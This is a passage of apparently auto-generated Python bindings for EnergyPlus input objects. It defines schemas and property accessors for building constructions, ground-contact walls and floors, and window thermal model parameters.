"""field `Thermal Conductivity 22`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 22`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_22` or None if not set
"""
return self["Thermal Conductivity 22"]
@thermal_conductivity_22.setter
def thermal_conductivity_22(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 22`"""
self["Thermal Conductivity 22"] = value
@property
def moisture_content_23(self):
"""field `Moisture Content 23`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 23`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_23` or None if not set
"""
return self["Moisture Content 23"]
@moisture_content_23.setter
def moisture_content_23(self, value=None):
"""Corresponds to IDD field `Moisture Content 23`"""
self["Moisture Content 23"] = value
@property
def thermal_conductivity_23(self):
"""field `Thermal Conductivity 23`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 23`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_23` or None if not set
"""
return self["Thermal Conductivity 23"]
@thermal_conductivity_23.setter
def thermal_conductivity_23(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 23`"""
self["Thermal Conductivity 23"] = value
@property
def moisture_content_24(self):
"""field `Moisture Content 24`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 24`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_24` or None if not set
"""
return self["Moisture Content 24"]
@moisture_content_24.setter
def moisture_content_24(self, value=None):
"""Corresponds to IDD field `Moisture Content 24`"""
self["Moisture Content 24"] = value
@property
def thermal_conductivity_24(self):
"""field `Thermal Conductivity 24`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 24`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_24` or None if not set
"""
return self["Thermal Conductivity 24"]
@thermal_conductivity_24.setter
def thermal_conductivity_24(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 24`"""
self["Thermal Conductivity 24"] = value
@property
def moisture_content_25(self):
"""field `Moisture Content 25`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 25`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_25` or None if not set
"""
return self["Moisture Content 25"]
@moisture_content_25.setter
def moisture_content_25(self, value=None):
"""Corresponds to IDD field `Moisture Content 25`"""
self["Moisture Content 25"] = value
@property
def thermal_conductivity_25(self):
"""field `Thermal Conductivity 25`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 25`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_25` or None if not set
"""
return self["Thermal Conductivity 25"]
@thermal_conductivity_25.setter
def thermal_conductivity_25(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 25`"""
self["Thermal Conductivity 25"] = value
class Construction(DataObject):
"""Corresponds to IDD object `Construction` Start with outside layer and
work your way to the inside layer Up to 10 layers total, 8 for windows
Enter the material name for each layer."""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'outside layer',
{'name': u'Outside Layer',
'pyname': u'outside_layer',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 2',
{'name': u'Layer 2',
'pyname': u'layer_2',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 3',
{'name': u'Layer 3',
'pyname': u'layer_3',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 4',
{'name': u'Layer 4',
'pyname': u'layer_4',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 5',
{'name': u'Layer 5',
'pyname': u'layer_5',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 6',
{'name': u'Layer 6',
'pyname': u'layer_6',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 7',
{'name': u'Layer 7',
'pyname': u'layer_7',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 8',
{'name': u'Layer 8',
'pyname': u'layer_8',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 9',
{'name': u'Layer 9',
'pyname': u'layer_9',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 10',
{'name': u'Layer 10',
'pyname': u'layer_10',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'Construction',
'pyname': u'Construction',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def outside_layer(self):
"""field `Outside Layer`
Args:
value (str): value for IDD Field `Outside Layer`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outside_layer` or None if not set
"""
return self["Outside Layer"]
@outside_layer.setter
def outside_layer(self, value=None):
"""Corresponds to IDD field `Outside Layer`"""
self["Outside Layer"] = value
@property
def layer_2(self):
"""field `Layer 2`
Args:
value (str): value for IDD Field `Layer 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_2` or None if not set
"""
return self["Layer 2"]
@layer_2.setter
def layer_2(self, value=None):
"""Corresponds to IDD field `Layer 2`"""
self["Layer 2"] = value
@property
def layer_3(self):
"""field `Layer 3`
Args:
value (str): value for IDD Field `Layer 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_3` or None if not set
"""
return self["Layer 3"]
@layer_3.setter
def layer_3(self, value=None):
"""Corresponds to IDD field `Layer 3`"""
self["Layer 3"] = value
@property
def layer_4(self):
"""field `Layer 4`
Args:
value (str): value for IDD Field `Layer 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_4` or None if not set
"""
return self["Layer 4"]
@layer_4.setter
def layer_4(self, value=None):
"""Corresponds to IDD field `Layer 4`"""
self["Layer 4"] = value
@property
def layer_5(self):
"""field `Layer 5`
Args:
value (str): value for IDD Field `Layer 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_5` or None if not set
"""
return self["Layer 5"]
@layer_5.setter
def layer_5(self, value=None):
"""Corresponds to IDD field `Layer 5`"""
self["Layer 5"] = value
@property
def layer_6(self):
"""field `Layer 6`
Args:
value (str): value for IDD Field `Layer 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_6` or None if not set
"""
return self["Layer 6"]
@layer_6.setter
def layer_6(self, value=None):
"""Corresponds to IDD field `Layer 6`"""
self["Layer 6"] = value
@property
def layer_7(self):
"""field `Layer 7`
Args:
value (str): value for IDD Field `Layer 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_7` or None if not set
"""
return self["Layer 7"]
@layer_7.setter
def layer_7(self, value=None):
"""Corresponds to IDD field `Layer 7`"""
self["Layer 7"] = value
@property
def layer_8(self):
"""field `Layer 8`
Args:
value (str): value for IDD Field `Layer 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_8` or None if not set
"""
return self["Layer 8"]
@layer_8.setter
def layer_8(self, value=None):
"""Corresponds to IDD field `Layer 8`"""
self["Layer 8"] = value
@property
def layer_9(self):
"""field `Layer 9`
Args:
value (str): value for IDD Field `Layer 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_9` or None if not set
"""
return self["Layer 9"]
@layer_9.setter
def layer_9(self, value=None):
"""Corresponds to IDD field `Layer 9`"""
self["Layer 9"] = value
@property
def layer_10(self):
"""field `Layer 10`
Args:
value (str): value for IDD Field `Layer 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_10` or None if not set
"""
return self["Layer 10"]
@layer_10.setter
def layer_10(self, value=None):
"""Corresponds to IDD field `Layer 10`"""
self["Layer 10"] = value
class ConstructionCfactorUndergroundWall(DataObject):
""" Corresponds to IDD object `Construction:CfactorUndergroundWall`
Alternate method of describing underground wall constructions
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'c-factor',
{'name': u'C-Factor',
'pyname': u'cfactor',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m2-K'}),
(u'height',
{'name': u'Height',
'pyname': u'height',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'Construction:CfactorUndergroundWall',
'pyname': u'ConstructionCfactorUndergroundWall',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def cfactor(self):
"""field `C-Factor`
| Enter C-Factor without film coefficients or soil
| Units: W/m2-K
Args:
value (float): value for IDD Field `C-Factor`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cfactor` or None if not set
"""
return self["C-Factor"]
@cfactor.setter
def cfactor(self, value=None):
""" Corresponds to IDD field `C-Factor`
"""
self["C-Factor"] = value
@property
def height(self):
"""field `Height`
| Enter height of the underground wall
| Units: m
Args:
value (float): value for IDD Field `Height`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `height` or None if not set
"""
return self["Height"]
@height.setter
def height(self, value=None):
"""Corresponds to IDD field `Height`"""
self["Height"] = value
class ConstructionFfactorGroundFloor(DataObject):
""" Corresponds to IDD object `Construction:FfactorGroundFloor`
Alternate method of describing slab-on-grade or underground floor constructions
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'f-factor',
{'name': u'F-Factor',
'pyname': u'ffactor',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'area',
{'name': u'Area',
'pyname': u'area',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm2'}),
(u'perimeterexposed',
{'name': u'PerimeterExposed',
'pyname': u'perimeterexposed',
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'Construction:FfactorGroundFloor',
'pyname': u'ConstructionFfactorGroundFloor',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def ffactor(self):
"""field `F-Factor`
| Units: W/m-K
| IP-Units: Btu/h-ft-F
Args:
value (float): value for IDD Field `F-Factor`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `ffactor` or None if not set
"""
return self["F-Factor"]
@ffactor.setter
def ffactor(self, value=None):
""" Corresponds to IDD field `F-Factor`
"""
self["F-Factor"] = value
@property
def area(self):
"""field `Area`
| Enter area of the floor
| Units: m2
Args:
value (float): value for IDD Field `Area`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `area` or None if not set
"""
return self["Area"]
@area.setter
def area(self, value=None):
"""Corresponds to IDD field `Area`"""
self["Area"] = value
@property
def perimeterexposed(self):
"""field `PerimeterExposed`
| Enter exposed perimeter of the floor
| Units: m
Args:
value (float): value for IDD Field `PerimeterExposed`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `perimeterexposed` or None if not set
"""
return self["PerimeterExposed"]
@perimeterexposed.setter
def perimeterexposed(self, value=None):
"""Corresponds to IDD field `PerimeterExposed`"""
self["PerimeterExposed"] = value
class ConstructionInternalSource(DataObject):
""" Corresponds to IDD object `Construction:InternalSource`
Start with outside layer and work your way to the inside Layer
Up to 10 layers total, 8 for windows
Enter the material name for each layer
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'source present after layer number',
{'name': u'Source Present After Layer Number',
'pyname': u'source_present_after_layer_number',
'required-field': True,
'autosizable': False,
'minimum': 1,
'autocalculatable': False,
'type': u'integer'}),
(u'temperature calculation requested after layer number',
{'name': u'Temperature Calculation Requested After Layer Number',
'pyname': u'temperature_calculation_requested_after_layer_number',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'integer'}),
(u'dimensions for the ctf calculation',
{'name': u'Dimensions for the CTF Calculation',
'pyname': u'dimensions_for_the_ctf_calculation',
'maximum': 2,
'required-field': True,
'autosizable': False,
'minimum': 1,
'autocalculatable': False,
'type': u'integer'}),
(u'tube spacing',
{'name': u'Tube Spacing',
'pyname': u'tube_spacing',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'outside layer',
{'name': u'Outside Layer',
'pyname': u'outside_layer',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 2',
{'name': u'Layer 2',
'pyname': u'layer_2',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 3',
{'name': u'Layer 3',
'pyname': u'layer_3',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 4',
{'name': u'Layer 4',
'pyname': u'layer_4',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 5',
{'name': u'Layer 5',
'pyname': u'layer_5',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 6',
{'name': u'Layer 6',
'pyname': u'layer_6',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 7',
{'name': u'Layer 7',
'pyname': u'layer_7',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 8',
{'name': u'Layer 8',
'pyname': u'layer_8',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 9',
{'name': u'Layer 9',
'pyname': u'layer_9',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 10',
{'name': u'Layer 10',
'pyname': u'layer_10',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'Construction:InternalSource',
'pyname': u'ConstructionInternalSource',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def source_present_after_layer_number(self):
"""field `Source Present After Layer Number`
| refers to the list of materials which follows
| value >= 1
Args:
value (int): value for IDD Field `Source Present After Layer Number`
Raises:
ValueError: if `value` is not a valid value
Returns:
int: the value of `source_present_after_layer_number` or None if not set
"""
return self["Source Present After Layer Number"]
@source_present_after_layer_number.setter
def source_present_after_layer_number(self, value=None):
"""Corresponds to IDD field `Source Present After Layer Number`"""
self["Source Present After Layer Number"] = value
@property
def temperature_calculation_requested_after_layer_number(self):
"""field `Temperature Calculation Requested After Layer Number`
| refers to the list of materials which follows
Args:
value (int): value for IDD Field `Temperature Calculation Requested After Layer Number`
Raises:
ValueError: if `value` is not a valid value
Returns:
int: the value of `temperature_calculation_requested_after_layer_number` or None if not set
"""
return self["Temperature Calculation Requested After Layer Number"]
@temperature_calculation_requested_after_layer_number.setter
def temperature_calculation_requested_after_layer_number(self, value=None):
"""Corresponds to IDD field `Temperature Calculation Requested After
Layer Number`"""
self["Temperature Calculation Requested After Layer Number"] = value
@property
def dimensions_for_the_ctf_calculation(self):
"""field `Dimensions for the CTF Calculation`
| 1 = 1-dimensional calculation, 2 = 2-dimensional calculation
| value >= 1
| value <= 2
Args:
value (int): value for IDD Field `Dimensions for the CTF Calculation`
Raises:
ValueError: if `value` is not a valid value
Returns:
int: the value of `dimensions_for_the_ctf_calculation` or None if not set
"""
return self["Dimensions for the CTF Calculation"]
@dimensions_for_the_ctf_calculation.setter
def dimensions_for_the_ctf_calculation(self, value=None):
"""Corresponds to IDD field `Dimensions for the CTF Calculation`"""
self["Dimensions for the CTF Calculation"] = value
@property
def tube_spacing(self):
"""field `Tube Spacing`
| uniform spacing between tubes or resistance wires in direction
| perpendicular to main intended direction of heat transfer
| Units: m
Args:
value (float): value for IDD Field `Tube Spacing`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `tube_spacing` or None if not set
"""
return self["Tube Spacing"]
@tube_spacing.setter
def tube_spacing(self, value=None):
"""Corresponds to IDD field `Tube Spacing`"""
self["Tube Spacing"] = value
@property
def outside_layer(self):
"""field `Outside Layer`
Args:
value (str): value for IDD Field `Outside Layer`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outside_layer` or None if not set
"""
return self["Outside Layer"]
@outside_layer.setter
def outside_layer(self, value=None):
"""Corresponds to IDD field `Outside Layer`"""
self["Outside Layer"] = value
@property
def layer_2(self):
"""field `Layer 2`
Args:
value (str): value for IDD Field `Layer 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_2` or None if not set
"""
return self["Layer 2"]
@layer_2.setter
def layer_2(self, value=None):
"""Corresponds to IDD field `Layer 2`"""
self["Layer 2"] = value
@property
def layer_3(self):
"""field `Layer 3`
Args:
value (str): value for IDD Field `Layer 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_3` or None if not set
"""
return self["Layer 3"]
@layer_3.setter
def layer_3(self, value=None):
"""Corresponds to IDD field `Layer 3`"""
self["Layer 3"] = value
@property
def layer_4(self):
"""field `Layer 4`
Args:
value (str): value for IDD Field `Layer 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_4` or None if not set
"""
return self["Layer 4"]
@layer_4.setter
def layer_4(self, value=None):
"""Corresponds to IDD field `Layer 4`"""
self["Layer 4"] = value
@property
def layer_5(self):
"""field `Layer 5`
Args:
value (str): value for IDD Field `Layer 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_5` or None if not set
"""
return self["Layer 5"]
@layer_5.setter
def layer_5(self, value=None):
"""Corresponds to IDD field `Layer 5`"""
self["Layer 5"] = value
@property
def layer_6(self):
"""field `Layer 6`
Args:
value (str): value for IDD Field `Layer 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_6` or None if not set
"""
return self["Layer 6"]
@layer_6.setter
def layer_6(self, value=None):
"""Corresponds to IDD field `Layer 6`"""
self["Layer 6"] = value
@property
def layer_7(self):
"""field `Layer 7`
Args:
value (str): value for IDD Field `Layer 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_7` or None if not set
"""
return self["Layer 7"]
@layer_7.setter
def layer_7(self, value=None):
"""Corresponds to IDD field `Layer 7`"""
self["Layer 7"] = value
@property
def layer_8(self):
"""field `Layer 8`
Args:
value (str): value for IDD Field `Layer 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_8` or None if not set
"""
return self["Layer 8"]
@layer_8.setter
def layer_8(self, value=None):
"""Corresponds to IDD field `Layer 8`"""
self["Layer 8"] = value
@property
def layer_9(self):
"""field `Layer 9`
Args:
value (str): value for IDD Field `Layer 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_9` or None if not set
"""
return self["Layer 9"]
@layer_9.setter
def layer_9(self, value=None):
"""Corresponds to IDD field `Layer 9`"""
self["Layer 9"] = value
@property
def layer_10(self):
"""field `Layer 10`
Args:
value (str): value for IDD Field `Layer 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_10` or None if not set
"""
return self["Layer 10"]
@layer_10.setter
def layer_10(self, value=None):
"""Corresponds to IDD field `Layer 10`"""
self["Layer 10"] = value
class WindowThermalModelParams(DataObject):
""" Corresponds to IDD object `WindowThermalModel:Params`
object is used to select which thermal model should be used in tarcog simulations
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'standard',
{'name': u'standard',
'pyname': u'standard',
'default': u'ISO15099',
'required-field': False,
'autosizable': False,
'accepted-values': [u'ISO15099',
u'EN673Declared',
u'EN673Design'],
'autocalculatable': False,
'type': 'alpha'}),
(u'thermal model',
{'name': u'Thermal Model',
'pyname': u'thermal_model',
'default': u'ISO15099',
'required-field': False,
'autosizable': False,
'accepted-values': [u'ISO15099',
u'ScaledCavityWidth',
u'ConvectiveScalarModel_NoSDThickness',
u'ConvectiveScalarModel_withSDThickness'],
'autocalculatable': False,
'type': 'alpha'}),
(u'sdscalar',
{'name': u'SDScalar',
'pyname': u'sdscalar',
'default': 1.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'deflection model',
{'name': u'Deflection Model',
'pyname': u'deflection_model',
'default': u'NoDeflection',
'required-field': False,
'autosizable': False,
'accepted-values': [u'NoDeflection',
u'TemperatureAndPressureInput',
u'MeasuredDeflection'],
'autocalculatable': False,
'type': 'alpha'}),
(u'vacuum pressure limit',
{'name': u'Vacuum Pressure Limit',
'pyname': u'vacuum_pressure_limit',
'default': 13.238,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'Pa'}),
(u'initial temperature',
{'name': u'Initial temperature',
'pyname': u'initial_temperature',
'default': 25.0,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'initial pressure',
{'name': u'Initial pressure',
'pyname': u'initial_pressure',
'default': 101325.0,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'Pa'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'WindowThermalModel:Params',
'pyname': u'WindowThermalModelParams',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def standard(self):
"""field `standard`
| Default value: ISO15099
Args:
value (str): value for IDD Field `standard`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `standard` or None if not set
"""
return self["standard"]
@standard.setter
def standard(self, value="ISO15099"):
"""Corresponds to IDD field `standard`"""
self["standard"] = value
@property
def thermal_model(self):
"""field `Thermal Model`
| Default value: ISO15099
Args:
value (str): value for IDD Field `Thermal Model`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `thermal_model` or None if not set
"""
return self["Thermal Model"]
@thermal_model.setter
def thermal_model(self, value="ISO15099"):
"""Corresponds to IDD field `Thermal Model`"""
self["Thermal Model"] = value
@property
def sdscalar(self):
"""field `SDScalar`
| Default value: 1.0
| value <= 1.0
Args:
value (float): value for IDD Field `SDScalar`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `sdscalar` or None if not set
"""
return self["SDScalar"]
@sdscalar.setter
def sdscalar(self, value=1.0):
"""Corresponds to IDD field `SDScalar`"""
self["SDScalar"] = value
@property
def deflection_model(self):
"""field `Deflection Model`
| Default value: NoDeflection
Args:
value (str): value for IDD Field `Deflection Model`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `deflection_model` or None if not set
"""
return self["Deflection Model"]
@deflection_model.setter
def deflection_model(self, value="NoDeflection"):
"""Corresponds to IDD field `Deflection Model`"""
self["Deflection Model"] = value
@property
def vacuum_pressure_limit(self):
"""field `Vacuum Pressure Limit`
| Units: Pa
| Default value: 13.238
Args:
value (float): value for IDD Field `Vacuum Pressure Limit`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `vacuum_pressure_limit` or None if not set
"""
return self["Vacuum Pressure Limit"]
@vacuum_pressure_limit.setter
def vacuum_pressure_limit(self, value=13.238):
"""Corresponds to IDD field `Vacuum Pressure Limit`"""
self["Vacuum Pressure Limit"] = value
@property
def initial_temperature(self):
"""field `Initial temperature`
| This is temperature in time of window fabrication
| Units: C
| Default value: 25.0
Args:
value (float): value for IDD Field `Initial temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `initial_temperature` or None if not set
"""
return self["Initial temperature"]
@initial_temperature.setter
def initial_temperature(self, value=25.0):
"""Corresponds to IDD field `Initial temperature`"""
self["Initial temperature"] = value
@property
def initial_pressure(self):
"""field `Initial pressure`
| This is pressure in time of window fabrication
| Units: Pa
| Default value: 101325.0
Args:
value (float): value for IDD Field `Initial pressure`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `initial_pressure` or None if not set
"""
return self["Initial pressure"]
@initial_pressure.setter
def initial_pressure(self, value=101325.0):
"""Corresponds to IDD field `Initial pressure`"""
self["Initial pressure"] = value
class ConstructionComplexFenestrationState(DataObject):
""" Corresponds to IDD object `Construction:ComplexFenestrationState`
Describes one state for a complex glazing system
These input objects are typically generated by using WINDOW software and export to IDF syntax
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'basis type',
{'name': u'Basis Type',
'pyname': u'basis_type',
'default': u'LBNLWINDOW',
'required-field': False,
'autosizable': False,
'accepted-values': [u'LBNLWINDOW',
u'UserDefined'],
'autocalculatable': False,
'type': 'alpha'}),
(u'basis symmetry type',
{'name': u'Basis Symmetry Type',
'pyname': u'basis_symmetry_type',
'default': u'None',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Axisymmetric',
u'None'],
'autocalculatable': False,
'type': 'alpha'}),
(u'window thermal model',
{'name': u'Window Thermal Model',
'pyname': u'window_thermal_model',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'basis matrix name',
{'name': u'Basis Matrix Name',
'pyname': u'basis_matrix_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'solar optical complex front transmittance matrix name',
{'name': u'Solar Optical Complex Front Transmittance Matrix Name',
'pyname': u'solar_optical_complex_front_transmittance_matrix_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'solar optical complex back reflectance matrix name',
{'name': u'Solar Optical Complex Back Reflectance Matrix Name',
'pyname': u'solar_optical_complex_back_reflectance_matrix_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'visible optical complex front transmittance matrix name',
{'name': u'Visible Optical Complex Front Transmittance Matrix Name',
'pyname': u'visible_optical_complex_front_transmittance_matrix_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'visible optical complex back transmittance matrix name',
{'name': u'Visible Optical Complex Back Transmittance Matrix Name',
'pyname': u'visible_optical_complex_back_transmittance_matrix_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'outside layer name',
{'name': u'Outside Layer Name',
'pyname': u'outside_layer_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'outside layer directional front absoptance matrix name',
{'name': u'Outside Layer Directional Front Absoptance Matrix Name',
'pyname': u'outside_layer_directional_front_absoptance_matrix_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'outside layer directional back absoptance matrix name',
{'name': u'Outside Layer Directional Back Absoptance Matrix Name',
'pyname': u'outside_layer_directional_back_absoptance_matrix_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'gap 1 name',
{'name': u'Gap 1 Name',
'pyname': u'gap_1_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'cfs gap 1 directional front absoptance matrix name',
{'name': u'CFS Gap 1 Directional Front Absoptance Matrix Name',
'pyname': u'cfs_gap_1_directional_front_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'cfs gap 1 directional back absoptance matrix name',
{'name': u'CFS Gap 1 Directional Back Absoptance Matrix Name',
'pyname': u'cfs_gap_1_directional_back_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 2 name',
{'name': u'Layer 2 Name',
'pyname': u'layer_2_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
